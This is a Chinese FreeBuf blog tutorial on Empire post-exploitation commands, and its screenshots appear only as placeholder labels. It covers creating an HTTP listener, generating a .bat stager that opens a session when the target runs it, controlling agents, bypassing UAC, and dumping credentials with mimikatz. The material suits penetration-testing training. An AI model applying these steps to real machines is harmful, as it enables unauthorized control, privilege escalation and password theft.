freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day14-empire基础命令的使用
2020-11-17 09:32:48

empire的基础操作

1. 建立监听器

help    查看帮助命令

wps1

listeners     查看监听器

wps2

uselistener  xxx     使用监听器模块

常用的监听模块:http

按两次tab键查看能使用的监听器模块

wps3


info    查看参数信息

wps5

设置参数

set Name xxx

wps6

set Host http://xxx

wps7

set Port xxx

wps8

wps9

执行:execute

wps10

main 返回主菜单

这边显示目前有一个活跃的监听器

wps11


2. 设置stagers

usestagers xxx   使用stager模块

常用的模块:windows/hta、windows/launcher_bat

按两次tab键查看能使用的stager模块

wps12


info  查看要设置的参数

wps14

set Listener xx     设置监听器

wps15

set OutFile /var/www/html/launcher.bat 设置文件生成路劲

wps16

delete   木马运行完是否自动删除

Obfuscate(混淆)

wps17

execute 执行

wps18

在靶机上双击bat文件成功反弹会话

wps19


3. 用户交互

agents 切换到用户列表

wps20

list 列出用户

wps21

rename 修改用户ID的名字

wps22

interact 进入到用户交互界面

wps23

sysinfo     查看系统信息

wps24

sc  截屏

wps25

wps26

searchmodule 搜索模块

wps27

shell + command 执行命令

wps28

spawn 迁移到新的用户需要指定监听器的名字

wps29

wps30

产生了一个新的会话

wps31

用户清除:

kill agents | all

wps32

监听器清除:

kill listener | all

wps33


4. 提权

绕过uac

bypassuac  <listener>      bypassuac绕过uac提权

wps34

可以看到产生了一个带*的会话,提权成功用户名前面会多一个*号


mimikatz      在拥有权限后可以利用mimikatz获取用户账号密码

wps36

creds         以列表的形式显示mimikatz获取的账号密码


uac提权(需要手动确认)

searchmodule ask 搜索ask模块

wps38

usemodule privesc/ask       使用privesc/ask模块

有些图片丢失详情可以看我的博客园

info    查看所需参数

wps40

设置监听器

wps41

run   执行

wps42

靶机弹出uac认证框


列表中产生新的管理员会话

wps44

# 内网渗透 # Empire # 后渗透工具
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者